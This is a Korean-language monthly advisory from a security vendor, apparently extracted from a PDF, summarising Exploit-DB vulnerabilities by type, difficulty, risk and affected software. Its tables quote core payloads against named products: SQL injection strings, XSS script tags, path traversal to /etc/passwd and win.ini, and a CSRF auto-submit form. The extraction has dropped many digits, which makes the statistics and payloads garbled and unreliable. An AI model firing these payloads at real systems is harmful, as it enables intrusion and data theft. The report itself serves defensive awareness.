EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

Size: px

Start display at page:

Download "EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj"

미소 점
6 years ago
Views:

1 EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은 SQL Injection 의공격난이도가 [ 하 ] 로분류되어있으면서위험도가 [ 상 ] 인공격이다수존재하는부분입니다. 쉽게시도가능한공격임에도불구하고고객의웹환경에비교적큰피해를입힐수있어각별한주의및적절한대응마련이필요합니다. 이외 SQL Injection중난이도가높은공격코드에서일반적인패턴이아닌공격코드가발견되어해당이통하는웹환경의관리자역시각별한주의가필요할것으로판단됩니다. 또, 지난달 위를기록했던 XSS 공격에대한역시비교적많은개수가보고되었습니다. XSS 의경우공격난이도가 [ 하 ] 이면서공격위험도가 [ 중 ] 으로분류되는이다수로, 지난달에이어이번달에도 XSS 공격에대해서는지속적으로주의가필요합니다. 주요소프트웨어별분석결과, 에서가장많은수의이보고되었으며, 보고된모두이번달특히주의가필요한 SQL Injection과 XSS 관련이었습니다. 사용고객은, 보고된에대한대응이가능한최신버전으로의업데이트를진행하여해당에대해서대응할수있도록해야하겠습니다.. 별보고개수 보고개수 SQL Injection XSS 8 LFI 6 File Upload Directory Traversal CSRF 총합계 별보고개수 6 SQL Injection XSS LFI File Upload Directory Traversal CSRF. 위험도별분류위험도 보고개수 백분율 상 38% 중 8 6% 하 0 0% 합계 9 00% 8 위험도별분류 상 중 3. 공격난이도별현황공격난이도 보고개수 백분율 상 4 4% 중 7% 하 3 79% 합계 9 00% 공격난이도별현황 4 상 중 하 3 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 5 주요소프트웨어별발생현황 3 ell SonicWall Applicatio Ilch 5 Ilch Church Edit McAfee Asset Manager 3 Procentia IntelliPen Kemana Directory LuxCal Church Edit Trixbox SpagoBI McAfee Asset Manager Synology 총합계 9

2 EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Injection 하 상 CMS.0 - comments_paginate.php SQL Injection 3037 SQL Injection 하 중 CMS.0 - stores_paginate.php SQL Injection 3037 XSS 하 중 CMS.0 - comments_paginate.php XSS 3037 XSS 하 중 CMS.0 - stores_paginate.php XSS 3037 XSS 하 중 CMS.0 - index.php XSS

3 EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /test.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f dd009908f File Upload 하상 SpagoBI Worksheet designer function File Upload filename="xss.html" Content-Type: application/octet-stream SpagoBI SpagoBI 4.0 <!DOCTYPE html> <html> <head> <script> function myfunction() {alert("xss");} </script> </head> <body> <input type="button" onclick="myfunction()" value="show alert SQL Injection 하 상 SQL Injection 하 중 XSS 하 중 XSS 하 중 XSS 하 중 CMS.0 - comments_paginate.php SQL Injection CMS.0 - stores_paginate.php SQL Injection CMS.0 - comments_paginate.php XSS CMS.0 - stores_paginate.php XSS CMS.0 - index.php XSS box"> /admin/ajax/comments_paginate.php?secho=&icolumns=7&sc olumns=&idisplaystart=0%0and%0=&idisplaylength=50 %0and%0= /admin/ajax/stores_paginate.php?secho=&icolumns=&scolu mns=&idisplaystart=0%0and%0=&idisplaylength=50%0 and%0= /admin/ajax/comments_paginate.php?secho="><script>alert(); </script> /admin/ajax/stores_paginate.php?secho="><script>alert();</sc ript> POST /admin/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ CMS.0 CMS.0 CMS.0 CMS.0 CMS.0 POST /index.php/guestbook/index/newentry HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 하중 Ilch CMS.0 - newentry XSS 취약 점 Ilch Ilch CMS.0 ilch_token=5a d4756b9b8803b48fba8b&name=name & = %40 .com&homepage=http%3a%f%fsite.c SQL Injection 중상 Directory Traversal 하중 LFI 하상..7 - ajax_udf.php SQL Injection Ajax File Manager Directory Traversal - ajax_get_file_listing.php Directory Traversal 5.4.0, 6.0 RC, GA - browse.php LFI om&text=<script>alert('immuniwweb');</script>&saveentry=su /ajax_udf.php?q=&add_value=odm_user%0union%0select %0,version%8%9,3,4,5,6,7,8,9 /ajaxfilemanager/ajax_get_file_listing.php?limit=0&view=thumb nail&search=&search_name=&search_recursively=0&search_mt ime_from=&search_mtime_to=&search_folder=../../../../../../../../ho me/phungv93/public_html/ POST /vtigercrm6rc/kcfinder/browse.php?type=files&lng=en&act=do wnload HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ , 6.0 RC, GA SQL Injection 하상 SQL Injection 하상 Procentia IntelliPen Data.aspx SQL Injection LuxCal rssfeed.php SQL Injection /Resources/System/Templates/Data.aspx?DocID=&field=JobID &value=%0and%0=&jobid=&parentdocid=694&intab =&ParentKey=JobNumber&NoStore=&Popup= /lux/rssfeed.php?cal=(select(0)from(select(sleep(0)))v)/*%7%b(s elect(0)from(select(sleep(0)))v)%b%7%%b(select(0)from(sele ct(sleep(0)))v)%b%*/ Procentia Procentia IntelliPen IntelliPen...50 LuxCal LuxCal 3..

4 EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 POST /gnupanelreseller.php?seccion=tickets&plugin=enviar_ticket HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Content-Disposition: form-data; name=""keyword"" CSRF 하중 SQL Injection 중상 SQL Injection 하중 0.3.5_R4 - gnupanelreseller.php CSRF Trixbox All Versions - conf_cdr.php SQL Injection Synology DSM article.php SQL Injection <form id="baba" method="post" action=" <input name="asunto" size="45" value="demo" maxlength="54"> <textarea name="consultar" rows="0" cols="50"><script>alert("xss");</script></textarea> <input name="ingresando" value="" type="hidden"> <input name="resetea" value="reset" type="reset"> <input name="agrega" value="send" type="submit"> </form> <script type="text/javascript">document.getelementbyid("baba").submit /web-meetme/conf_cdr.php?bookid=' RLIKE (SELECT (CASE WHEN (97=97) THEN ELSE 0x8 END)) AND 'AIdK'='AIdK POST /photo/include/blog/article.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Trixbox Synology 0.3.5_R4 Trixbox All Versions Synology DSM SQL Injection 하 중 SQL Injection 상 상 SQL Injection 상 상 SQL Injection 상 상 LFI 하 중 XSS 하 중 LFI 하 중 LFI 하 중 LFI 하 중 XSS 하 중 Church Edit - gallery.php SQL Injection.0 - login.php SQL Injection.0 - responder.php SQL Injection.0 - verarticulo.php SQL Injection McAfee Asset Manager downloadreport LFI < 4.7./ < 4.8.4/ sample-name.html XSS CMS task.php LFI Kemana Directory task.php LFI task.php LFI settings.php XSS list_type=label&value=%0and%03**%3d6%0and%08 /photos/gallery.php?gallery_id=%0and%0=&pg= Church Edit Church Edit /login.php? correoelectronico=(select(0)from(select(sleep(0)) )v)/*'%b(select(0)from(select(sleep(0)))v)%b'%%b(select(0)fr om(select(sleep(0)))v)%b%*/&pass=g00dpa%4%4w0rd&su bmit=login /responder.php?idarticulo=&name=&staff=no&submit=send&t ext_content=if(now()%3dsysdate()%csleep(0)%c0)/*'xor(if(now ()%3dsysdate()%csleep(0)%c0))OR'%XOR(if(now()%3dsysdate ()%csleep(0)%c0))or%*/ /support/verarticulo.php?id=if(now()%3dsysdate()%csleep(0)% c0)/*'xor(if(now()%3dsysdate()%csleep(0)%c0))or'%xor(if( now()%3dsysdate()%csleep(0)%c0))or%*/ /servlet/downloadreport?reportfilename=../../../../../../../../etc/pas McAfee Asset swd&format=csv /tag/sample/samplename.html?cur=&listtype=tag&pgnr=&searchtag=<script>ale rt()</script> /qe6_0/admin/task.php?run=../../../../../../windows/win.ini /kemana/admin/task.php?run=../../../../../../windows/win.ini /ce3_0/admin/task.php?run=../../../../../../windows/win.ini POST /admin/settings.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Manager Kemana Directory McAfee Asset Manager 6.6 < 4.7./ < 4.8.4/5..4 CMS Kemana Directory LFI 하중 SQL Injection 상상 download.php LFI build xhr.php SQL Injection /download.php?log=../../etc/passwd POST /xhr.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ i={"r":"controller","i":{"pgn8state":{"l":0,"o":0,"or":"(case+when +(substring(@@version,,)='m')+then+nu. +else+nu.nick name+end)","d":"asc"},"refresh_on":[["addcommit",null],["editco mmit",null],["deletecommit",null],["activatecommit",null],["deactiv atecommit",null]],"iw_refresh_action":"listusers","iw_refresh_ctrl":" Ctrl_Nodeworx_Users","security_token":"- ensv4z4pdyomp3pg8lrvswrthye","c":"index","a":"livepayloadco build 574

5 EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /settings_advanced.html HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW XSS 하 중 AppleWebKit/535.7 KHTML, like Gecko Chrome/ settings_advanced XSS Content-Disposition: form-data; name="snmpcomstr" XSS 하중 - settings_upload_dlicense.html XSS snwl>>"%0<script>alert()</script>.jpg POST /test.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f dd009908f filename="%0<script>alert()</script>.jpg" Content-Type: image/jpeg POST /xhr.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ SQL Injection 상상 XSS 하중 build xhr.php SQL Injection - settings_advanced XSS i={"r":"controller","i":{"pgn8state":{"l":0,"o":0,"or":"(case+when +(substring(@@version,,)='m')+then+nu. +else+nu.nick name+end)","d":"asc"},"refresh_on":[["addcommit",null],["editco mmit",null],["deletecommit",null],["activatecommit",null],["deactiv atecommit",null]],"iw_refresh_action":"listusers","iw_refresh_ctrl":" Ctrl_Nodeworx_Users","security_token":"- ensv4z4pdyomp3pg8lrvswrthye","c":"index","a":"livepayloadco POST /settings_advanced.html HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Content-Disposition: form-data; name="snmpcomstr" build 574 snwl>>"%0<script>alert()</script>.jpg POST /test.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT XSS 하중 - settings_upload_dlicense.html XSS 6.; WOW64; Trident/6.0) dd009908f dd009908f filename="%0<script>alert()</script>.jpg" Content-Type: image/jpeg

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.